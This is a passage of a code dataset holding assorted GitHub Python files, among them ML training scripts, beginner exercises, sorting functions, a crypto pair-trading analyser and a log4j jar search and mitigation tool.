= tf.cast(tf.not_equal(y_true, 0.), tf.float32)\n y_true = tf.maximum(y_true - 1., 0.)\n y_true = y_true * (1.0 - self.smoothing) + 0.5 * self.smoothing\n bxentropy = tf.keras.backend.binary_crossentropy(y_true, y_pred, from_logits=False)\n\n bxentropy *= weights\n loss = tf.reduce_sum(bxentropy) / (tf.reduce_sum(weights) + 1e-4)\n return loss\n","repo_name":"scott-pu-pennstate/dktt_light","sub_path":"dktt_light/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"28663395918","text":"import random\r\nimport time\r\nimport sys\r\nimport os\r\nimport combat\r\n\r\ndef string(x):\r\n\r\n i = 0\r\n while i < len(x):\r\n for char in x: \r\n print(char, end=\"\") \r\n sys.stdout.flush() \r\n time.sleep(0.02) \r\n i += 1\r\n else:\r\n print(\"\")\r\n\r\ndef CharacterMenu():\r\n\r\n\r\n def Player_Stats():\r\n global PlayerStats\r\n PlayerStats = {\"LEVEL\":combat.User.level,\"EXP\": combat.User.XP,\"HEALTH\": combat.User.health,\"STRENGTH\": combat.User.strength, \"AGILITY\": combat.User.agility, \"LEVEL UP POINTS\": combat.User.LVP}\r\n \r\n string(\"THESE ARE YOUR CHARACTER STATS:\\n\")\r\n \r\n for x in PlayerStats: string(f\"{x}: {PlayerStats[x]}\")\r\n\r\n\r\n def LevelUpPointsMenu():\r\n while combat.User.LVP > 0:\r\n string(\"WHAT STAT WOULD YOU LIKE TO LEVEL UP?:\\n\")\r\n string(f\"[1] HEALTH: {PlayerStats['HEALTH']}\")\r\n string(f\"[2] STRENGTH: {PlayerStats['STRENGTH']}\")\r\n string(f\"[3] AGILITY: {PlayerStats['AGILITY']}\")\r\n string(f\"[4] BACK TO OTHER MENU\")\r\n choice = int(input(\": \"))\r\n\r\n if choice == 1:\r\n combat.User.health += 20\r\n combat.User.LVP -= 1\r\n\r\n string(f\"YOUR HEALTH IS NOW {combat.User.health}\")\r\n \r\n if choice == 2:\r\n combat.User.strength += 1\r\n combat.User.LVP -= 1\r\n\r\n string(f\"YOUR STRENGTH IS NOW {combat.User.strength}\")\r\n \r\n if choice == 3:\r\n combat.User.agility += 1\r\n combat.User.LVP -= 1\r\n string(f\"YOUR AGILITY IS NOW {combat.User.agility}\")\r\n elif choice == 4:\r\n return \r\n else:\r\n string(\"YOU HAVE NO POINTS TO SPEND\")\r\n \r\n def Menu():\r\n\r\n string(\"\\n[1] USE LEVEL POINT\")\r\n string(\"[2] CHECK EXP NEEDED UNTIL NEXT LEVEL UP\")\r\n string(\"[3] CHECK POINTS\")\r\n string(\"[4] BACK\")\r\n choice = input(\":\")\r\n\r\n if choice == \"1\":\r\n os.system(\"cls\")\r\n LevelUpPointsMenu()\r\n os.system('cls')\r\n Player_Stats()\r\n Menu()\r\n elif choice == \"2\":\r\n string(f\"\\nEXP NEEDED TO 
LEVEL UP: {100*combat.User.level - PlayerStats['EXP']}\\n\")\r\n Menu()\r\n elif choice == \"3\":\r\n string(f\"\\n YOUR SCORE IS {combat.Player_Points} POINTS.\")\r\n Menu()\r\n elif choice == \"4\":\r\n os.system(\"cls\")\r\n return\r\n else:\r\n Menu()\r\n Player_Stats()\r\n Menu()\r\n","repo_name":"JamiePacheco/Text-Based-RPG-","sub_path":"GameMainFile.py/Character.py","file_name":"Character.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74840465446","text":"'''Trains a simple convnet on the MNIST dataset.\r\nGets to 99.25% test accuracy after 12 epochs\r\n(there is still a lot of margin for parameter tuning).\r\n16 seconds per epoch on a GRID K520 GPU.\r\n'''\r\n\r\nfrom __future__ import print_function\r\nimport keras\r\nfrom keras.datasets import mnist\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\nimport numpy as np\r\n\r\n\r\n# Set that the color channel value will be first\r\nK.set_image_data_format('channels_first')\r\n\r\n# Set seed\r\nnp.random.seed(0)\r\n\r\n# Load data and target from MNIST data\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\nbatch_size = 128\r\nnum_classes = 10\r\nepochs = 12\r\n\r\n# input image dimensions\r\nimg_rows, img_cols = 28, 28\r\n\r\nif K.image_data_format() == 'channels_first':\r\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\r\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\r\n input_shape = (1, img_rows, img_cols)\r\nelse:\r\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\r\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\r\n input_shape = (img_rows, img_cols, 1)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\nprint('x_train shape:', x_train.shape)\r\nprint(x_train.shape[0], 'train samples')\r\nprint(x_test.shape[0], 'test samples')\r\n\r\n# convert class vectors to binary class matrices\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\n# Start neural network\r\nmodel = Sequential()\r\n\r\n# Add convolutional layer with 32 filters, a 3x3 window, and ReLU activation function\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),\r\n activation='relu',\r\n input_shape=input_shape))\r\n\r\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\r\n\r\n# Add max pooling layer with a 2x2 window\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# Add dropout layer\r\nmodel.add(Dropout(0.25))\r\n\r\n# Add layer to flatten input\r\nmodel.add(Flatten())\r\n\r\n# # Add fully connected layer of 128 units with a ReLU activation function\r\nmodel.add(Dense(128, activation='relu'))\r\n\r\n# Add dropout layer\r\nmodel.add(Dropout(0.5))\r\n\r\n# Add fully connected layer with a softmax activation function\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n# Compile neural network\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\n# Train neural network\r\nmodel.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\nscore = model.evaluate(x_test, y_test, verbose=0)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', 
score[1])\r\n","repo_name":"cognitiveRobot/simpleCNN-MNIST","sub_path":"simpleCNN.py","file_name":"simpleCNN.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2180448071","text":"#basics1 \npi = 22/7\n\nradian = 32*(pi/180) #this converts 32 degrees to radian\nprint(radian) #this prints out the radian\n\n#this is for basics 2\n\nr= input(\"Please input the raduis of your sphere\") #this ask the user to input the radius\nd = float(r)\nrr =d*d #this squares the raduis\nrrr = d*d*d\n\nsurface_area = 4*pi*rr\nprint(\"the surface area is \", surface_area) # this prints out the surface area\nvolume = (4/3)*pi*rrr\nprint(\"the volume is \", volume) # this prints out the volume\n\n\n#basics3\n\nfrom datetime import datetime\nnow = datetime.now()\ndt_strig = now.strftime(\"%H:%M\")\nprint(\"the time is = \",dt_strig )\nprint(now)\n\n\n","repo_name":"konlanz/python_globalcode","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17441162454","text":"# 순서있음\ndef perm_recur(level, result, visited):\n global l, n, m\n if level == m:\n return result\n for i in range(n):\n if visited[i] ==False:\n visited[i] = True\n result[level] = l[i]\n perm_recur(level+1, result, visited)\n visited[i] = False\n\ndef permutation(l, m): # 순서 있음\n n = len(l)\n result = [0]*m\n visited = [False]*n\n perm_recur(0, result, visited)\n\n# 순서 없음\ndef comb_recur(level, idx, result):\n global l, n, m\n if level == m:\n return result\n for i in range(idx, n):\n result[level] = l[i]\n comb_recur(level+1, idx+1, result)\n\ndef combination(l, m):\n result = [0]*m\n n = len(l)\n comb_recur(0, 0, result)","repo_name":"dodoyeon/SW_Academy","sub_path":"comb_perm_prac.py","file_name":"comb_perm_prac.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11870869169","text":"# https://codeup.kr/problem.php?id=6085\n# 6085 : [기초-종합] 그림 파일 저장용량 계산하기\n\n# 입력\n# w, h, b 가 공백을 두고 입력된다.\n# 단, w, h는 모두 정수이고 1~1024 이다. 
+{"seq_id":"11870869169","text":"# https://codeup.kr/problem.php?id=6085\n# 6085 : [Basics - Comprehensive] Compute the storage size of an image file\n\n# Input\n# w, h and b are given, separated by spaces.\n# w and h are integers in 1~1024; b is a multiple of 4, at most 40.\n#\n# Output\n# Print the required storage space converted to MB,\n# rounded at the third decimal place and printed to two decimal places.\n\nw, h, b=map(int,input().split())\n\n\ni = w * h * b / 8 / 1024 /1024\nprint(format(i, \".2f\"), \"MB\")\n\n\n","repo_name":"kim-soohyeon/codeup_100","sub_path":"codeup_6081-6098/6085.py","file_name":"6085.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26405278038","text":"from binance.client import Client\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.stats import pearsonr\nimport statsmodels.api as sm\nfrom statsmodels.tsa.stattools import adfuller\nimport matplotlib.pyplot as plt\nimport json\nimport pika\n\nclass Candle:\n    def __init__(self, args):\n        self.openTime = args['time']\n        self.open = args['open']\n        self.high = args['high']\n        self.low = args['low']\n        self.close = float(args['close'])\n        self.volume = float(args['volume'])\n        self.closeTime = args['closeTime']\n        self.quoteAssetVolume = args['assetVolume']\n        self.numberOfTrades = args['trades']\n        self.takerBuyBaseAssetVolume = args['buyBaseVolume']\n        self.takerBuyQuoteAssetVolume = args['buyAssetVolume']\n        self.ignore = args['ignored']\n\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='NEED_ANALYZE_PAIR', durable=True)\nchannel.queue_declare(queue='RESULT_ANALYZE_PAIR', durable=True)\n\nconnected = []\nold_z = '0'\n\n\ndef check_correlation(firstCurrencyCloses, secondCurrencyCloses):\n    if firstCurrencyCloses.empty or secondCurrencyCloses.empty:\n        print(\"No data.\")\n    else:\n        correlation = pearsonr(firstCurrencyCloses, secondCurrencyCloses)\n        print(correlation)\n        print(np.corrcoef(firstCurrencyCloses, secondCurrencyCloses))\n        print('Pearson correlation coefficient: ', correlation[0])\n\n\ndef check_for_stationarity(X, cutoff=0.01):\n    # https://habr.com/ru/post/207160/\n    # https://www.machinelearningmastery.ru/time-series-data-stationary-python/\n    if adfuller(X)[0] > adfuller(X)[4]['5%']:\n        print('unit root present, the series is non-stationary')\n        return False  # fixed: originally returned True here, contradicting the function name and every caller\n    else:\n        print('no unit root, the series is stationary')\n        return True\n    # We must observe significant p-value to convince ourselves that the series is stationary\n    # pvalue = adfuller(X)[1]\n    # if pvalue < cutoff:\n    #     return True\n    # else:\n    #     return False\n\n\ndef get_stationarity_state(is_stationarity=False):\n    stationarity_in_string = \"stationary\"\n    non_stationarity_in_string = \"non-stationary\"\n\n    return stationarity_in_string if is_stationarity else non_stationarity_in_string\n
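A minimal sketch (not from the record above): the ADF decision rule used in check_for_stationarity(), demonstrated on synthetic series; only numpy and statsmodels are assumed.

import numpy as np
from statsmodels.tsa.stattools import adfuller

rng = np.random.default_rng(0)
random_walk = np.cumsum(rng.normal(size=500))  # has a unit root -> non-stationary
white_noise = rng.normal(size=500)             # stationary

for name, series in [('random_walk', random_walk), ('white_noise', white_noise)]:
    result = adfuller(series)
    stat, crit_5 = result[0], result[4]['5%']
    # reject the unit-root null (i.e. call it stationary) when the statistic is below the 5% critical value
    print(name, 'stationary' if stat < crit_5 else 'non-stationary')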
\ndef plot_residuals(residuals):\n    plt.clf()\n    plt.plot(residuals, color='blue')\n    plt.show()\n\n\ndef set_z_score(firstCurrencyCloses, secondCurrencyCloses):\n    x = sm.add_constant(secondCurrencyCloses)\n    y = firstCurrencyCloses\n    model = sm.OLS(y, x).fit()\n\n    resid = model.resid\n\n    is_resid_stationarity = check_for_stationarity(resid)\n\n    plot_residuals(resid)\n    print(\"The residual series of the currency pair is {0}\".format(get_stationarity_state(is_resid_stationarity)))\n\n    if is_resid_stationarity:\n        b = model.params[1]  # slope on the regressor; params[0] is the intercept added by add_constant\n\n        x = secondCurrencyCloses\n\n        y = firstCurrencyCloses\n\n        residual = y - b * x\n        #residual = secondCurrencyCloses / firstCurrencyCloses\n\n        z = (residual - np.mean(residual)) / np.std(residual)\n\n        # numeric thresholds for the trading band\n        z_upper_limit = np.mean(z) + np.std(z)\n        z_lower_limit = np.mean(z) - np.std(z)\n\n        return z, z_upper_limit, z_lower_limit\n\n\ndef analysisPair(firstCurrencyData, secondCurrencyData):\n    firstCurrencyData = list(map(lambda x: Candle(x), firstCurrencyData))\n    secondCurrencyData = list(map(lambda x: Candle(x), secondCurrencyData))\n\n    firstCurrencyClosesList = list(map(lambda x: x.close, firstCurrencyData))\n    secondCurrencyClosesList = list(map(lambda x: x.close, secondCurrencyData))\n\n    firstCurrencyCloses = pd.Series(firstCurrencyClosesList)\n    secondCurrencyCloses = pd.Series(secondCurrencyClosesList)\n\n    print('Data points for the first currency: ' + str(len(firstCurrencyCloses)))\n    print('Data points for the second currency: ' + str(len(secondCurrencyCloses)))\n\n    # TODO\n    if (len(firstCurrencyCloses) != len(secondCurrencyCloses)):\n        return\n\n    is_stationarity_first_currency = check_for_stationarity(firstCurrencyCloses)\n    is_stationarity_second_currency = check_for_stationarity(secondCurrencyCloses)\n\n    # check_correlation(firstCurrencyCloses, secondCurrencyCloses)\n    print('Correlation coefficient: ', firstCurrencyCloses.corr(secondCurrencyCloses))\n\n    (z, z_upper_limit, z_lower_limit) = set_z_score(firstCurrencyCloses, secondCurrencyCloses)\n\n    last_z_value = z[len(z) - 1]\n    strZ = str(last_z_value)\n\n    print('_____Z: ' + str(last_z_value))\n    plt.plot(z, color='black')\n    plt.plot(np.repeat(z_upper_limit, len(z)), 'r--')\n    plt.plot(np.repeat(z_lower_limit, len(z)), 'y--')\n    plt.show()\n    # plt.plot((secondCurrencyCloses / firstCurrencyCloses), color='black')\n    # plt.axhline((secondCurrencyCloses / firstCurrencyCloses).mean(), color='red', linestyle='--')\n\n\n    return z.tolist(), \\\n           z_upper_limit, \\\n           z_lower_limit, \\\n           list(map(lambda x: x.closeTime, firstCurrencyData)), \\\n           firstCurrencyClosesList, \\\n           secondCurrencyClosesList\n\ndef callback(ch, method, properties, body):\n    bodyParse = json.loads(body)\n    z, z_upper_limit, z_lower_limit, time, price1, price2 = analysisPair(bodyParse['firstCurrencyData'], bodyParse['secondCurrencyData'])\n\n\n    sendDataQMQP = {}\n    sendDataQMQP['z_data'] = {}\n    sendDataQMQP['messageId'] = ''\n    sendDataQMQP['z_data']['z'] = z\n    sendDataQMQP['z_data']['z_upper_limit'] = z_upper_limit\n    sendDataQMQP['z_data']['z_lower_limit'] = z_lower_limit\n    sendDataQMQP['z_data']['time'] = time\n    sendDataQMQP['z_data']['price1'] = price1\n    sendDataQMQP['z_data']['price2'] = price2\n    sendDataQMQP['messageId'] = bodyParse['messageId']\n\n    channel.basic_publish(exchange='',\n                          routing_key='RESULT_ANALYZE_PAIR',\n                          body=json.dumps(sendDataQMQP))\n\n\nchannel.basic_consume(queue='NEED_ANALYZE_PAIR',\n                      auto_ack=True,\n                      on_message_callback=callback)\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"EvgnEvgn/bot_trader","sub_path":"version2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
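A minimal sketch: the z-score spread construction at the heart of set_z_score() above, on synthetic prices with an assumed hedge ratio (the record estimates it via OLS).

import numpy as np

rng = np.random.default_rng(1)
x = 100 + np.cumsum(rng.normal(0, 0.5, 300))   # price series of currency 2
y = 2.0 * x + rng.normal(0, 1.0, 300)          # currency 1 tracks it with ratio ~2

b = 2.0                                        # assumed hedge ratio (the OLS slope in the record)
residual = y - b * x
z = (residual - np.mean(residual)) / np.std(residual)
upper, lower = np.mean(z) + np.std(z), np.mean(z) - np.std(z)  # z is standardized, so roughly +1 / -1
print(round(z[-1], 3), round(upper, 3), round(lower, 3))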
+{"seq_id":"8645873896","text":"import multiprocessing\nimport pandas as pd\nfrom os import path\nfrom gensim.models.doc2vec import TaggedDocument, Doc2Vec\nfrom spacy.lang.en import English\nfrom spacy.tokenizer import Tokenizer\nfrom webapp import normalize\n\nnlp = English()\ntokenizer = Tokenizer(nlp.vocab)\ncurrent_dir = path.abspath('.')\nMODEL_FILE_NAME = path.join(path.abspath('.'), 'model_file')\n\n# load the data and drop the columns we don't need\ndata = pd.read_csv(path.join(current_dir, 'tweets.csv'), index_col=0)\ndata = data.drop_duplicates(subset=['id'])\n\n\ndef process(text, *, remove_stopwords=True, remove_punct=False):\n    norm = normalize(text, remove_stopwords)\n    tokens = list(tokenizer(norm))\n    if remove_punct:\n        tokens = [t for t in tokens if not t.is_punct or t.is_space]\n    return [str(token) for token in tokens]\n\n\ndata.loc[:, 'tokens'] = data.text.apply(process)\nsentences = []\nfor ind in data.index:\n    tweet_tokens = data['tokens'][ind]\n    sentences.append(TaggedDocument(tweet_tokens, [ind]))\n\nsize = 300\ncontext_window = 50\nmin_count = 1\nmax_iter = 200\n\nmodel = Doc2Vec(\n    documents=sentences,\n    min_count=min_count,  # ignore words with freq less than min_count\n    max_vocab_size=None,\n    window=context_window,  # the number of words before and after to be used as context\n    size=size,  # is the dimensionality of the feature vector\n    workers=multiprocessing.cpu_count(),\n    iter=max_iter  # number of iterations (epochs) over the corpus)\n)\n\nmodel.save(MODEL_FILE_NAME)\n","repo_name":"gekrfg/data_egn_projet2","sub_path":"create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37446149008","text":"def bubble_sort(items):\n\n    '''Return array of items, sorted in ascending order'''\n\n    for num in range(len(items)-1,0,-1):\n        for i in range(num):\n            if items[i]>items[i+1]:\n                temp = items[i]\n                items[i] = items[i+1]\n                items[i+1] = temp\n    \n    return items  # fixed: originally returned the function object bubble_sort itself\n\n\ndef merge_sort(items):\n\n    '''Return array of items, sorted in ascending order'''\n\n    if len(items) < 2:\n        return items\n    \n    result,mid = [],int(len(items)/2)\n\n    y = merge_sort(items[:mid])\n    z = merge_sort(items[mid:])\n\n    while (len(y) > 0) and (len(z) > 0):\n        if y[0] > z[0]:result.append(z.pop(0)) \n        else:result.append(y.pop(0))\n\n    result.extend(y+z)\n    return result\n\n\ndef quick_sort(items):\n\n    '''Return array of items, sorted in ascending order'''\n\n    if len(items) <= 1:\n        return items\n    else:\n        return quick_sort([x for x in items[1:] if x < items[0]]) + \\\n               [items[0]] + \\\n               quick_sort([x for x in items[1:] if x >= items[0]])\n\n\n\n\n","repo_name":"Smisosenkosi/mypackage","sub_path":"mypackage-master/test/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
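A minimal sketch: sanity-checking the three sorts from sorting.py above (with the bubble_sort return fix) against Python's built-in sorted() on arbitrary data.

data = [5, 1, 4, 2, 8, 0, 2]
assert bubble_sort(list(data)) == sorted(data)
assert merge_sort(list(data)) == sorted(data)
assert quick_sort(list(data)) == sorted(data)
print('all three sorts agree with sorted()')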
+{"seq_id":"37092578062","text":"#from main_model_transformer_saveweights import create_masks\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\n\n\nnum_layers = 4  # number of encoding layers in the encoder stack\nd_model = 128  # word-embedding dimension\ndff = 512  # units in the feed-forward network\nnum_heads = 8  # number of attention heads\nEPOCHS = 20\n# buffer\nBUFFER_SIZE = 2000  # shuffle\nBATCH_SIZE = 32\n\n\ntest_text = []\nwith open('data/test.txt','r') as f:\n    test_text = f.read()\n\nnew_model = tf.keras.models.load_model('saved_model_dir')\nprint(new_model.summary())\n\ndef create_masks(inp, tar):  # build the masks from this iteration's input and target\n    enc_padding_mask = create_padding_mask(inp)  # padding masks for the encoder and decoder\n    dec_padding_mask = create_padding_mask(inp)\n\n    look_ahead_mask = create_look_ahead_mask(tf.shape(tar)[1])  # mask over tokens not yet generated\n    dec_target_padding_mask = create_padding_mask(tar)  # padding mask over the target sequence\n    combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)  # elementwise maximum merges the two masks\n\n    return enc_padding_mask, combined_mask, dec_padding_mask  # three masks\n\ndef create_padding_mask(seq):\n    seq = tf.cast(tf.math.equal(seq, 0), tf.float32)  # 1.0 wherever the token id equals 0 (padding)\n    return seq[:, tf.newaxis, tf.newaxis, :]\n\ndef create_look_ahead_mask(size):\n    mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)\n    return mask\n\ndef evaluate(input_document):\n    # tokenize the input into word indices, then pad\n    input_document = document_tokenizer.texts_to_sequences([input_document])\n    input_document = tf.keras.preprocessing.sequence.pad_sequences(input_document, maxlen=encoder_maxlen,\n                                                                   padding='post', truncating='post')\n\n    # expand_dims adds a batch dimension at axis 0\n    encoder_input = tf.expand_dims(input_document[0], 0)  # the first (and only) input document\n    # decoding starts from the <go> token\n    decoder_input = [summary_tokenizer.word_index[\"<go>\"]]\n    output = tf.expand_dims(decoder_input, 0)\n\n    for i in range(decoder_maxlen):\n        # generate tokens in a loop until the maximum length is reached\n        # the masks change dynamically as the output grows\n\n        # call the transformer built earlier, with training set to False\n        predictions, attention_weights = new_model(\n            [encoder_input,output],\n            training=False,\n        )\n\n        # pick the most likely word index via argmax\n        predictions = predictions[:, -1:, :]\n        predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\n\n        if predicted_id == summary_tokenizer.word_index[\"<stop>\"]:\n            # decoding is done\n            print(\"predict over\")\n            return tf.squeeze(output, axis=0), attention_weights\n        # append to the word-index sequence\n        output = tf.concat([output, predicted_id], axis=-1)\n\n    return tf.squeeze(output, axis=0), attention_weights\n\n\ndef summarize(input_document):\n    # not considering attention weights for now, can be used to plot attention heatmaps in the future\n    summarized = evaluate(input_document=input_document)[0].numpy()\n    print(\"document: \",input_document)\n    summarized = np.expand_dims(summarized[1:], 0)  # not printing <go> token\n    return summary_tokenizer.sequences_to_texts(summarized)[0]  # since there is just one translated document\n    # turn the token ids back into text\n\n\n\n\nnews = pd.read_excel(\"data/news_lessthan_500words.xlsx\")\n\n# clean the data\n# news.drop(['news_id', 'url', 'pub_time', 'article_level_one', 'article_level_two','title'], axis=1, inplace=True)\nnews = news.dropna(axis='index',how='any')\n# split into documents and summaries\ndocument = news['content']\nsummary = news['abstract']\n\nsummary = summary.apply(lambda x: '<go> ' + x + ' <stop>')\n\nfilters = '!\"#$%&()*+,-./:;=?@[\\\\]^_`{|}~\\t\\n'\noov_token = '<unk>'\n\ndocument_tokenizer = tf.keras.preprocessing.text.Tokenizer(oov_token=oov_token)\nsummary_tokenizer = tf.keras.preprocessing.text.Tokenizer(filters=filters, oov_token=oov_token)\n\ndocument_tokenizer.fit_on_texts(document)\nsummary_tokenizer.fit_on_texts(summary)\n\nencoder_vocab_size = len(document_tokenizer.word_index) + 1\ndecoder_vocab_size = len(summary_tokenizer.word_index) + 1\n\nencoder_maxlen = 500\ndecoder_maxlen = 70\n\nret = summarize(test_text)\nprint(ret)\n\n","repo_name":"JiangZfeng/my_text_summarization","sub_path":"predict_transformer.py","file_name":"predict_transformer.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
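A minimal sketch: what create_look_ahead_mask() above returns for size=4; a 1.0 marks a blocked (future) position, so row i can only attend to positions <= i.

import tensorflow as tf

mask = 1 - tf.linalg.band_part(tf.ones((4, 4)), -1, 0)
print(mask.numpy())
# [[0. 1. 1. 1.]
#  [0. 0. 1. 1.]
#  [0. 0. 0. 1.]
#  [0. 0. 0. 0.]]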
+{"seq_id":"16535563197","text":"from dataclasses import dataclass\nfrom typing import List, Optional, TYPE_CHECKING\n\nfrom .cps_element import CpsElement\n\nif TYPE_CHECKING:\n    from .dataspace import Dataspace  # pylint: disable=cyclic-import\n\n\n@dataclass\nclass SchemaSetModuleReference:\n    \"\"\"Schema set module reference dataclass.\n\n    Stores all information about module reference.\n    \"\"\"\n\n    namespace: str\n    revision: str\n    name: Optional[str] = None\n\n\nclass SchemaSet(CpsElement):\n    \"\"\"Schema set class.\"\"\"\n\n    def __init__(self,\n                 name: str,\n                 dataspace: \"Dataspace\",\n                 module_references: Optional[List[SchemaSetModuleReference]] = None) -> None:\n        \"\"\"Initialize schema set class object.\n\n        Args:\n            name (str): Schema set name\n            dataspace (Dataspace): Dataspace on which schema set was created.\n            module_references (Optional[List[SchemaSetModuleReference]], optional):\n                List of module references. Defaults to None.\n        \"\"\"\n        super().__init__()\n        self.name: str = name\n        self.dataspace: \"Dataspace\" = dataspace\n        self.module_references: List[SchemaSetModuleReference] = module_references \\\n            if module_references else []  # attribute name fixed: was misspelled \"module_refences\"\n\n    def __repr__(self) -> str:\n        \"\"\"Human readable representation of the object.\n\n        Returns:\n            str: Human readable string\n\n        \"\"\"\n        return f\"SchemaSet(name={self.name}, dataspace={self.dataspace.name})\"\n\n    def delete(self) -> None:\n        \"\"\"Delete schema set.\"\"\"\n        self.send_message(\n            \"DELETE\",\n            f\"Delete {self.name} schema set\",\n            f\"{self._url}/dataspaces/{self.dataspace.name}/schema-sets/{self.name}\",\n            auth=self.auth\n        )\n","repo_name":"onap/integration-python-onapsdk","sub_path":"src/onapsdk/cps/schemaset.py","file_name":"schemaset.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35748207521","text":"import sys\ninput = sys.stdin.readline\n\n_ = input()\nnums = list(map(int,input().split()))\nv = int(input())\nfreq = [0]*201\n\nfor n in nums:\n    temp = 100 + n\n    freq[temp] += 1\n\nprint(freq[100+v])","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/10807_개수 세기.py","file_name":"10807_개수 세기.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
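A minimal sketch: cross-checking the offset-array counting trick from the record above (indices shifted by +100 so values in -100..100 fit a plain list) against collections.Counter on sample data.

from collections import Counter

nums = [-100, 0, 100, 0]
v = 0
freq = [0] * 201
for n in nums:
    freq[100 + n] += 1
assert freq[100 + v] == Counter(nums)[v]
print(freq[100 + v])  # 2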
' File search.... '\n    diff_line = char_line * int((len(line) - len(greetings_text)) / 2)\n\n    print(char_horiz_line + line + char_horiz_line)\n    print(char_horiz_line + diff_line + greetings_text + diff_line + char_horiz_line)\n    print(char_horiz_line + line + char_horiz_line)\n\n\ndef gui_start():\n    # layout for the search window\n    layout = [[sg.Text('Please enter a search pattern:')],\n              [sg.InputText('log4*.jar')], [sg.Checkbox('Delete JMSAppender.class?')],\n              [sg.Submit(), sg.Cancel()]]\n\n    window = sg.Window('File search...', layout)\n    # event and values tuple\n\n    while True:\n        event, values = window.read()\n        if event == sg.WINDOW_CLOSED:\n            break\n        elif event == 'Cancel':\n            break\n        elif event == 'Submit':\n            break\n    window.close()\n    # read the entered values\n    text_input = values[0]\n    check_del = values[1]\n    return text_input, check_del, event\n\n\ndef gui_popup_result(result_data):\n    layout = [[sg.Listbox(result_data, expand_x=True, expand_y=True)], [sg.Button('OK', key='OK')]]\n    window = sg.Window('Result', layout, resizable=True, size=(800, 600), finalize=True)\n\n    while True:\n        event, values = window.read()\n\n        if event == sg.WINDOW_CLOSED:\n            break\n        elif event == 'OK':\n            break\n        else:\n            print('Done')\n    window.close()\n\n\ndef search(patterns, loc):\n    for path, dirs, files in os.walk(loc):\n        for file in fnmatch.filter(files, patterns):\n            yield os.path.join(path, file)\n\n\ndef argparser():\n    parser.add_argument('--default', '-d', nargs='?', const=def_pattern,\n                        required=False,\n                        help='Without an argument the default search pattern \"log4*.jar\" is used '\n                             '- with an argument you can set your own search pattern')\n\n    parser.add_argument('--remove', '-r', nargs='?', const=def_pattern,\n                        required=False,\n                        help='Remove JMSAppender.class from archive log4j.jar (newzipfile lib required)')\n    args = parser.parse_args()\n    # store everything in a dict\n    arg_dic = vars(args)\n    # print(arg_dic)\n    return arg_dic\n
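A minimal sketch: how the nargs='?' / const combination in argparser() above resolves; parse_args is fed explicit argv lists here so it runs outside the CLI.

import argparse

p = argparse.ArgumentParser()
p.add_argument('--default', '-d', nargs='?', const='log4j*.jar')
print(p.parse_args([]).default)               # None        (flag absent)
print(p.parse_args(['-d']).default)           # log4j*.jar  (flag given without a value -> const)
print(p.parse_args(['-d', '*.war']).default)  # *.war       (flag given with a value)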
